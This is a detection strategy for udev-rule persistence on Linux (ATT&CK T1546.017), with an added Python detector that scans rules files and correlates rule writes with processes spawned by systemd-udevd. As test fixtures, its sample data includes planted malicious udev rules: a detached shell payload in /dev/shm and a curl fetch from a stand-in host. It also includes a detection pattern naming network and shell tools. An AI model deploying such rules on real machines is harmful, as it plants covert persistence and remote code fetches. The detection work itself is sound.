
DET0375 Detection Strategy for T1546.017 - Udev Rules (Linux)

Item           Value
ID             DET0375
Version        1.0
Created        21 October 2025
Last Modified  21 October 2025

Technique Detected: T1546.017 (Udev Rules)

Analytics

Linux

AN1056

Monitor for creation or modification of udev rules files in the rule directories (/etc/udev/rules.d/, /lib/udev/rules.d/, /usr/lib/udev/rules.d/; /run/udev/rules.d/ is also consulted on systems that use it). Inspect new or changed rules for keys that execute a program (RUN+=, IMPORT{program}=, PROGRAM=) and flag commands that invoke shells or interpreters, download tools, or scripts in writable locations such as /tmp or /dev/shm. Correlate rule changes with process execution whose parent is systemd-udevd, and with udev reload or trigger commands (udevadm control --reload, udevadm trigger) issued shortly after the write. udev(7) documents that processes started via RUN are killed once event handling finishes, so a payload that wants to outlive the event has to break away from udevd (a common reason to see setsid, nohup, systemd-run or at in the RUN command); unexpected long-running or background processes descending from systemd-udevd are therefore a strong signal.

Log Sources
Data Component              Name                  Channel
File Modification (DC0061)  auditd:SYSCALL        chmod, write, create, open
Process Creation (DC0032)   auditd:SYSCALL        execve
Command Execution (DC0064)  auditd:CONFIG_CHANGE  udev rule reload or trigger command executed (udevadm control --reload, udevadm trigger)
Mutable Elements
Field                 Description
UdevRulePath          Path(s) to the udev rules directories; may vary by distribution or local configuration
SuspiciousRunPattern  Regex or string pattern that flags suspicious commands in RUN+=, IMPORT{program}= or PROGRAM= keys
TimeWindow            Maximum interval between a rule change and the correlated execution
ParentProcess         Expected parent of RUN-invoked commands (e.g., systemd-udevd)
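The analytic above, implemented as an added worked example (this is editorial illustration, not code from MITRE or the ATT&CK detection strategy). It does two things: scans a rules file for executing keys whose command matches a SuspiciousRunPattern, and correlates rule-file writes, udevadm reload/trigger commands and execs whose parent is systemd-udevd within a TimeWindow. The event lines are a constructed, already-normalised key=value format standing in for what a SIEM pipeline would produce from auditd PATH and SYSCALL records; the rules file content, the suspicious-command heuristics and the rules directory list are assumptions chosen for the example and should be tuned per environment.

```python
"""Detection logic for T1546.017 (udev rules): flag rules that execute suspicious
commands and correlate rule-file writes with processes spawned by systemd-udevd.

Added example. Event lines are a constructed, normalised key=value format (what a
SIEM might emit from auditd records), not raw auditd output.
"""
import re

# Mutable elements from the strategy, given illustrative values (assumptions; tune per site).
UDEV_RULE_DIRS = ("/etc/udev/rules.d/", "/lib/udev/rules.d/",
                  "/usr/lib/udev/rules.d/", "/run/udev/rules.d/")   # UdevRulePath
EXPECTED_PARENT = "systemd-udevd"                                   # ParentProcess
TIME_WINDOW = 300                                                   # TimeWindow, seconds

# udev keys that execute a program when a rule matches.
EXEC_KEY_RE = re.compile(r'(RUN(?:\{program\})?|IMPORT\{program\}|PROGRAM)\s*\+?=\s*"([^"]*)"')

# SuspiciousRunPattern: constructed heuristics, not an exhaustive list. Shell -c wrappers,
# download tools, interpreters, world-writable paths, detach helpers (udev kills RUN
# children when event handling ends, so persistence payloads try to break away), base64.
SUSPICIOUS_RE = re.compile(
    r"(?:^|\s|/)(?:sh|bash|dash)\s+-c|\b(?:curl|wget|nc|ncat|socat)\b"
    r"|\b(?:python[0-9.]*|perl|php)\b|/(?:tmp|dev/shm|var/tmp)/"
    r"|\b(?:setsid|nohup|systemd-run)\b|base64")

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def rule_file_hits(rule_text):
    """Return (line_no, key, command, matched_indicator) for each executing key whose
    command matches SUSPICIOUS_RE. Comments and match-only rules produce nothing."""
    hits = []
    for line_no, line in enumerate(rule_text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for key, cmd in EXEC_KEY_RE.findall(line):
            m = SUSPICIOUS_RE.search(cmd)
            if m:
                hits.append((line_no, key, cmd, m.group(0).strip()))
    return hits


def parse_event(line):
    """Parse one normalised key=value event line; quoted values may contain spaces."""
    ev = {k: (unquoted or quoted) for k, quoted, unquoted in KV_RE.findall(line)}
    ev["ts"] = int(ev["ts"])
    return ev


def correlate(lines, time_window=TIME_WINDOW):
    """Alert on execs whose parent is systemd-udevd that follow a udev rule-file write
    within time_window and/or run a suspicious command line; note any reload/trigger."""
    events = sorted((parse_event(ln) for ln in lines if ln.strip()), key=lambda e: e["ts"])
    rule_writes = [e for e in events
                   if e["type"] == "file_write" and e["path"].startswith(UDEV_RULE_DIRS)]
    reloads = [e for e in events if e["type"] == "exec"
               and e.get("cmdline", "").startswith("udevadm ")
               and ("--reload" in e["cmdline"] or " trigger" in e["cmdline"])]
    alerts = []
    for ev in events:
        if ev["type"] != "exec" or ev.get("pcomm") != EXPECTED_PARENT:
            continue
        now = ev["ts"]
        recent_writes = [w["path"] for w in rule_writes if 0 <= now - w["ts"] <= time_window]
        suspicious = SUSPICIOUS_RE.search(ev.get("cmdline", ""))
        if not recent_writes and not suspicious:
            continue  # ordinary udev helper with no preceding rule change
        alerts.append({
            "ts": now,
            "cmdline": ev.get("cmdline", ""),
            "rule_writes": recent_writes,
            "reload_seen": any(0 <= now - r["ts"] <= time_window for r in reloads),
            "indicator": suspicious.group(0).strip() if suspicious else None,
            "severity": "high" if recent_writes and suspicious else "medium",
        })
    return alerts


# Constructed sample rules file: one benign helper rule plus two planted execution rules.
SAMPLE_RULES = """\
# constructed sample, not a real rules file
ACTION=="add", SUBSYSTEM=="net", KERNEL=="eth*", RUN+="/usr/lib/udev/net-helper %k"
ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c 'setsid /dev/shm/.x/run.sh &'"
IMPORT{program}="/usr/bin/curl -s http://example.invalid/p"
"""

# Constructed normalised events (ts = epoch seconds, pcomm = parent process comm).
SAMPLE_EVENTS = [
    'ts=1000 type=exec comm="net-helper" pcomm="systemd-udevd" cmdline="/usr/lib/udev/net-helper eth0"',
    'ts=1100 type=file_write path="/etc/udev/rules.d/99-backdoor.rules" comm="vi"',
    'ts=1105 type=exec comm="udevadm" pcomm="bash" cmdline="udevadm control --reload"',
    'ts=1110 type=exec comm="sh" pcomm="systemd-udevd" cmdline="/bin/sh -c setsid /dev/shm/.x/run.sh &"',
    'ts=1200 type=file_write path="/home/ops/notes.txt" comm="vi"',
    'ts=5000 type=exec comm="setsid" pcomm="systemd-udevd" cmdline="/usr/bin/setsid /tmp/.d"',
]

if __name__ == "__main__":
    for hit in rule_file_hits(SAMPLE_RULES):
        print("rule hit:", hit)
    for alert in correlate(SAMPLE_EVENTS):
        print("alert:", alert)
```

On the sample data the benign net-helper exec at ts=1000 produces nothing, the shell spawned by udevd ten seconds after the rules-file write (with a reload in between) is rated high, and the later setsid exec is rated medium on the command line alone. Severity is deliberately driven by the combination of a recent rule write and a suspicious command, since either signal on its own is noisy on hosts where administrators legitimately edit rules or where vendor rules call helper scripts.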